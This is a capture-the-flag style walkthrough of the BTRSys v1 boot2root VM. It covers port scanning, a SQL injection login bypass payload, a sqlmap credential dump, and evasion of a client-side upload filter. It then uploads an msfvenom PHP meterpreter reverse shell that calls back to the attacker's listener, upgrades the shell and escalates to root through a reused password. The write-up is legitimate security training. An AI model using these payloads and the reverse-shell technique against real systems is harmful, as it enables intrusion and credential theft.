BTRSys v1 markets itself as a boot2root for beginners. It’s fairly simple but almost all of the content covered is different from the covfefe box that we covered earlier. You can find the file here, and it’ll download as a .rar file that you can decompress and import into VMWare.
Scanning
First step is to find the target machine. We’ll accomplish that by ping sweeping with nmap. First, we identify our own IP address:
ifconfig eth1
Looking next to inet in the output from ifconfig, we see that our own address is 10.10.7.17. We can now use nmap to identify the other machine:
Nmap scan report for 10.10.7.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for <strong>10.10.7.22</strong>
Host is up (0.00038s latency).
MAC Address: 00:0C:29:09:29:3D (VMware)
Nmap scan report for 10.10.7.30
Host is up (0.00019s latency).
MAC Address: 00:50:56:F2:2B:81 (VMware)
Nmap scan report for 10.10.7.17
Host is up.
Nmap done: 32 IP addresses (4 hosts up) scanned in 26.69 seconds
Our target is located at 10.10.7.22. The next step is to gather information about what services are accessible on the target. We’ll use nmap again to scan all of the TCP ports:
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating ARP Ping Scan at 14:56
Scanning 10.10.7.22 [1 port]
Completed ARP Ping Scan at 14:56, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:56
Completed Parallel DNS resolution of 1 host. at 14:56, 13.00s elapsed
Initiating SYN Stealth Scan at 14:56
Scanning 10.10.7.22 [65535 ports]
Discovered open port 22/tcp on 10.10.7.22
Discovered open port 80/tcp on 10.10.7.22
Discovered open port 21/tcp on 10.10.7.22
Completed SYN Stealth Scan at 14:56, 1.89s elapsed (65535 total ports)
Initiating Service scan at 14:56
Scanning 3 services on 10.10.7.22
Completed Service scan at 14:56, 6.02s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.7.22
NSE: Script scanning 10.10.7.22.
Initiating NSE at 14:56
NSE: [ftp-bounce] Couldn't resolve scanme.nmap.org, scanning 10.0.0.1 instead.
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 14:56, 20.48s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Nmap scan report for 10.10.7.22
Host is up (0.00029s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.7.17
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 00:0C:29:09:29:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 196.483 days (since Fri Jun 2 04:20:57 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 10.10.7.22
NSE: Script Post-scanning.
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.30 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
Key to note are ports 21, 22, and 80. The target is running FTP, SSH and a web server. By including the -A flag in the command, we gather information about the services that are running behind the ports, and what versions they likely are.
Knowing the publicly available services and what version each is, we can turn to searchsploit to try and identify some vulnerabilities to exploit:
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Den | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Den | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (M | exploits/unix/remote/17491.rb
--------------------------------------------- ----------------------------------
Unfortunately, all of the vsftpd vulnerabilities listed are for older versions than ours (3.0.2).
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
Debian OpenSSH - Authenticated Remote SELinu | exploits/linux/remote/6094.txt
Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIE | exploits/multiple/dos/1572.pl
FreeBSD OpenSSH 3.5p1 - Remote Command Execu | exploits/freebsd/remote/17462.txt
Novell Netware 6.5 - OpenSSH Remote Stack Ov | exploits/novell/dos/14866.txt
OpenSSH 1.2 - '.scp' File Create/Overwrite | exploits/linux/remote/20253.sh
OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-b | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token B | exploits/linux/remote/21402.txt
OpenSSH 3.x - Challenge-Response Buffer Over | exploits/unix/remote/21578.txt
OpenSSH 3.x - Challenge-Response Buffer Over | exploits/unix/remote/21579.txt
OpenSSH 4.3 p1 - Duplicated Block Remote Den | exploits/multiple/dos/2444.sh
OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Es | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service | exploits/linux/dos/40888.py
OpenSSH 7.2p1 - Authenticated xauth Command | exploits/multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Lib | exploits/linux/remote/40963.txt
OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | exploits/linux/remote/26.sh
OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | exploits/linux/remote/25.c
OpenSSHd 7.2p2 - Username Enumeration (PoC) | exploits/linux/remote/40113.txt
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | exploits/multiple/remote/3303.sh
glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - | exploits/linux/local/258.sh
--------------------------------------------- ----------------------------------
A note: when you use searchsploit, it can help to include version numbers in the command in order to cut down on the noise that is returned. Above, searching for all OpenSSH vulnerabilities returns a lot of options. Searching for something like Apache would produce even more. This can make it difficult to find applicable vulnerabilities. But by including a version in the search string, we could also miss out on vulnerabilities that impact a range of versions. For example, above we see two vulnerabilities that claim to impact all versions of OpenSSH less than 7.4. Searching for OpenSSH 6.6.1 wouldn’t return these. In this case, it doesn’t matter, because the two <7.4 vulnerabilities require specific configurations. We could make note and try them later just to be sure, but this will prove to be unnecessary. The same is true with the Apache server, so we will just move on and take a look at the FTP service that is running.
Port :21
nmap notified us that the FTP server at port 21 allows anonymous login with read only access. We will quickly verify this and see if there are any files available on the server.
220 (vsFTPd 3.0.2)
Name (10.10.7.22:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp>
Using the ls command, we see that there are no files on the server. We also double check that we can’t upload any files by using PUT. Unfortunately, this seems to be a dead-end, so we will move on to port 80.
Port :80
There are two great tools to gather information about a web server: nikto and dirb. Nikto will scan a server for known vulnerabilities, and dirb will take a wordlist and try to brute force the files and directories present. Between the two of them we can get a good idea of what the server looks like and some potential attack vectors.
Starting with nikto:
---------------------------------------------------------------------------
+ Target IP: 10.10.7.22
+ Target Hostname: 10.10.7.22
+ Target Port: 80
+ Start Time: 2017-12-15 15:00:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7517 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2017-12-15 15:00:22 (GMT-5) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Two big things to notice above are the file at /config.php and the login portal at /login.php. Browsing to /config.php yields nothing but a blank page. That’s ok, false positives happen with tools like this (technically, it isn’t a false positive because there is actually a file called config.php there, it’s just blank and therefore of little use to us). The login portal at /login.php looks promising, and I’ll go over why once we look at our dirb results:
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Dec 15 15:00:10 2017
URL_BASE: http://10.10.7.22/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.7.22/ ----
==> DIRECTORY: http://10.10.7.22/assets/
==> DIRECTORY: http://10.10.7.22/javascript/
+ http://10.10.7.22/server-status (CODE:403|SIZE:290)
==> DIRECTORY: http://10.10.7.22/uploads/
---- Entering directory: http://10.10.7.22/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.22/javascript/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery/
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/
---- Entering directory: http://10.10.7.22/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.22/javascript/jquery/ ----
+ http://10.10.7.22/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://10.10.7.22/javascript/jquery/version (CODE:200|SIZE:5)
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/css/
+ http://10.10.7.22/javascript/jquery-ui/jquery-ui (CODE:200|SIZE:434343)
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/themes/
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/ui/
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/css/ ----
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/themes/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/themes/base/
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/ui/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/ui/i18n/
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/themes/base/ ----
==> DIRECTORY: http://10.10.7.22/javascript/jquery-ui/themes/base/images/
+ http://10.10.7.22/javascript/jquery-ui/themes/base/jquery-ui (CODE:200|SIZE:32266)
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/ui/i18n/ ----
---- Entering directory: http://10.10.7.22/javascript/jquery-ui/themes/base/images/ ----
-----------------
END_TIME: Fri Dec 15 15:02:00 2017
DOWNLOADED: 204580 - FOUND: 5
There are a few things to notice here. First is that dirb seems to have missed login.php. This is why it’s really helpful to use the two tools together. The likely reason that is missed login.php (login is definitely in the wordlist) is that dirb is searching for a hit at http://10.10.7.22/login but our target is using php, and the pages therefore have .php as an extension. If we were to repeat the scan with the -X flag to add a file extension, we will see several files appear that didn’t before.
dirb http://10.10.7.22/ /usr/share/wordlists/dirb/big.txt -X .php
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Dec 15 17:41:04 2017
URL_BASE: http://10.10.7.22/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.7.22/ ----
+ http://10.10.7.22/config.php (CODE:200|SIZE:2)
+ http://10.10.7.22/index.php (CODE:200|SIZE:758)
+ http://10.10.7.22/login.php (CODE:200|SIZE:4561)
-----------------
END_TIME: Fri Dec 15 17:41:17 2017
DOWNLOADED: 20458 - FOUND: 3
Let’s take a look at login.php.
If we look at the source for this page, we see a script at the bottom which performs some input sanitation to try and prevent SQL injection. Unfortunately for the target, their solution is pretty weak and is easily avoided.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | function control(){ var user = document.getElementById("user").value; var pwd = document.getElementById("pwd").value; var str=user.substring(user.lastIndexOf("@")+1,user.length); if((pwd == "'")){ alert("Hack Denemesi !!!"); } else if (str!="btrisk.com"){ alert("Yanlis Kullanici Bilgisi Denemektesiniz"); } else{ document.loginform.submit(); } } |
The script performs two checks before submitting the login form and throws an error if either of them are tripped. The first check is whether or not the password being submitted is a single quote (‘). The second check is whether or not the username contains btrisk.com. Simple enough. By submitting username “btrisk.com” and password “a’ or 1=1;#” (not including the double quotes) the portal will log us in and present us with the next page:
EDIT: When redoing all of this for this write-up, the file upload page that we cover later on in the write-up magically began appearing. The first time that I did any of this, it did not. I tried clearing caches and cookies but it showed up every time. If you do not see a button to upload a file, ignore this edit and continue. If you do see one, you could skip down to the file upload portion, but I’d recommend continuing to follow the guide for some sqlmap password dumping goodness! Either way, know that your web page may not look quite like the one above. As long as the URL says /personel.php then chances are that you’re in the correct place.
We now know that the portal is vulnerable to SQLi. At this point I pulled out a tool called sqlmap to do the heavy lifting. sqlmap automates the whole injection process for you and can be used to dump some pretty handy information.
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:40:01
[15:40:02] [INFO] resuming back-end DBMS 'mysql'
[15:40:02] [INFO] testing connection to the target URL
[15:40:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kullanici_adi (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: kullanici_adi=lPmV' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvqzq','gzvTEybPtEhGrVJZSjungxLbHEzqbluthgFduNEB'),'qjzqq'),NULL-- jKCi&parola=
---
[15:40:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
[15:40:02] [INFO] fetching database names
available databases [4]:
[*] deneme
[*] information_schema
[*] mysql
[*] performance_schema
[15:40:02] [INFO] fetching tables for databases: 'deneme, information_schema, mysql, performance_schema'
Database: deneme
...
!!Abbreviated Output!!
...
[15:40:02] [INFO] fetching columns for table 'user' in database 'deneme'
[15:40:02] [INFO] fetching entries for table 'user' in database 'deneme'
Database: deneme
Table: user
[2 entries]
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| ID | Parola | BabaAdi | AnneAdi | Ad_Soyad | AnneMeslegi | BabaMeslegi | KardesSayisi | Kullanici_Adi |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| 1 | asd123*** | ahmet | nazli | ismail kaya | lokantaci | muhasebe | 5 | ikaya@btrisk.com |
| 2 | asd123*** | mahmut | gulsah | can demir | tuhafiyeci | memur | 8 | cdmir@btrisk.com |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
[15:40:02] [INFO] table 'deneme.`user`' dumped to CSV file '/root/.sqlmap/output/10.10.7.22/dump/deneme/user.csv'
[15:40:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.7.22'
[*] shutting down at 15:40:02
Notice towards the end of the above abbreviated output, that there is a user table with two entries. If you haven’t noticed by now, the box is in Turkish. So it may be useful to know the following translations…
Parola | Baba Adi | Anne Adi | Ad Soyad | Anne Meslegi | Baba Meslegi | Kardes Sayisi | Kullanici Adi |
Password | Father’s Name | Mother’s Name | Name Surname | Mother’s Occupation | Father’s Occupation | Number of Brothers | User’s Name |
Looking at the user table again, it looks like we have two user names and passwords that appear to be in plain text! Returning to the login portal at /login.php, if we log in with the first set of creds (ikaya@btrisk.com:asd123***), then we’re brought back to the /personel.php page but this time there is a file upload form present.
If we take a look at the page’s source, we once again see some javascript at the bottom, this time handling the file upload.
1 2 3 4 5 6 7 8 9 10 11 12 13 | // accept=".jpg,.png" function getFile(){ var filename = document.getElementById("dosya").value; var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined); if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){ document.myform.submit(); }else{ //mesaj alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz."); return false; } } |
Looks like they are only allowing .jpg, .png, and .gif files to be uploaded. This is pretty normal, it keeps users from uploading malicious things like php code that could generate a reverse shell (hint). Unfortunately for them, they are performing this check on the client side. This means that we can intercept the POST containing our file, and rename it to whatever we want. So if the page only allows images and we want to upload a .php file, we can name it with an image extension, intercept the POST and change that extension back to .php, and the server will treat it just like any other .php file. Let’s give it a try.
First we’ll generate our payload. We want to create a reverse tcp shell so that we can gain access to the box. Using msfvenom, we can create a payload that will open a meterpreter instance that we can interact with via metasploit. Set the port and IP that your test machine will listen on for the target to connect to.
1 | msfvenom -p php/meterpreter/reverse_tcp LPORT=52801 LHOST=10.10.7.17 -o rshell.jpg |
Next, edit the file and remove the /* at the beginning of the file:
1 | /*<!--?php /**/ error_reporting(0); $ip = '10.10.7.17'; $port = 52801; if (.......<br ?--> |
should change to:
1 |
Now, if we upload this file, the form will allow it because it thinks that the file is an image. But before we click ‘Gonder’ we need to set ourselves up to intercept the POST. There are many ways to do this, I like to use a firefox extension called tamper data (downloadable here). It’s simple, easy to use, and one less program that I need to have open. Once it’s installed, just go to tools and click on tamper data.
Click start tamper. Now we can click ‘Gonder’ to upload our file. We should see a message like the one below. Click tamper.
You will most likely see similar messages that are going to other URLs pop up while you are tampering. Just submit them. You only need to worry about the one that is going to your target IP. Now we will edit the message in order to change the file extension from jpg to php as seen below.
Once complete, click submit, and you can now stop tampering. You should see a new screen indicating that the file was uploaded. You can also now navigate to /uploads/ and you should see your file there.
Our payload is on the target. Now, before we execute it, we need to set our machine up so that it can handle the incoming request from the payload. Open up metasploit and wait for it to start up.
1 | msfconsole |
Once it is open, we need to use the multi/handler module. This is a particularly useful metasploit module that is capable of connecting the framework to payloads that are launched from outside of it (as in our case where we manually uploaded the payload and will execute it ourselves). To use and configure the payload, perform the following:
1 2 3 4 5 | use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 10.10.7.17 set LPORT 52801 run |
Of course, change the above to match your own environment. It is imperative that the settings match those in the msfvenom command that we executed above, otherwise it will likely fail. If you have entered run, you should see something like the below
[*] Started reverse TCP handler on 10.10.7.17:52801
This indicates that the handler is active and listening on 10.10.7.17:52801. Now, in your browser, either navigate to http://10.10.7.22/rshell.php or simply click on the file from the /uploads/ page. This will execute the code that it contains, and generate a reverse shell to your metasploit instance. A successful execution will look similar to the below:
[*] Started reverse TCP handler on 10.10.7.17:52801
[*] Sending stage (37543 bytes) to 10.10.7.22
[*] Meterpreter session 3 opened (10.10.7.17:52801 -> 10.10.7.22:51767) at 2017-12-15 23:01:40 -0500
meterpreter >
There are a number of commands available from here, just type shell and hit enter to get a shell on the target machine. The next step is to improve the limited shell that we now have. For example, if you were to try to use sudo, it would fail. The following line is extremely useful and works almost every time.
Process 4267 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@BTRsys1:/var/www/html/uploads$
Escalation
You should now have a familiar looking BASH shell. We are currently operating as user www-data. At this point we would begin to gather data from the machine itself and try to find a privilege escalation exploit. But one thing I always try in the lab is seeing if any of the creds that I already have have been reused, or if the current user can simply sudo su to root. Chances of www-data being given sudo privileges are next to nil. But what about that password that both of the web users were using? Perhaps it was reused?
su -
Password: asd123***
root@BTRsys1:~#
And we have root. This is why I always try to remember to check what I already have to see if any of it works. There’s no sense in crawling the system trying to enumerate vulnerabilities that may or may not even exist if I already have the key in my back pocket. It can end up saving hours of pain and wasted effort. at this point, we have accomplished the goal of the box, we now have root. You can search for other data at this point, try to crack the hashes in /etc/shadow (we already know one of them!), etc. Overall, a good, friendly boot2root that touches on some good web vulnerabilities. For extra challenge, don’t use sqlmap and see if you can figure out how to get the same information. Props to ismailonderkaya on the box, I enjoyed it!